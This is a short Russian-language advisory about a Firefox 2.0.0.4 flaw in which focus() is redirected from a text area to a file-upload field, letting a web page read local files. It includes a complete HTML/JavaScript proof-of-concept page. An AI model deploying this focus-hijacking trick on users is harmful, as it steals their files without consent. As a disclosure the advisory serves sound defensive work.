Программа: Mozilla Firefox 2.0.0.4

Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в функции focus(). Атакующий может без необходимости подтверждения перенаправить фокус с выделенных объектов на загрузку защищенного файла. Эксплуатирование уязвимости позволяет прочитать содержимое произвольных файлов на системе жертвы.

Пример:

<html>
<body>
<script>
function restore()
{
 document.getElementById("text1").value=document.getElementById("file1").value;
 document.getElementById("text1").focus();
}

function doKeyDown()
{
 document.getElementById("label1").focus();
}
</script>

<input type="file" id="file1" name="file1" onkeydown="restore();" onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>



Оставить мнение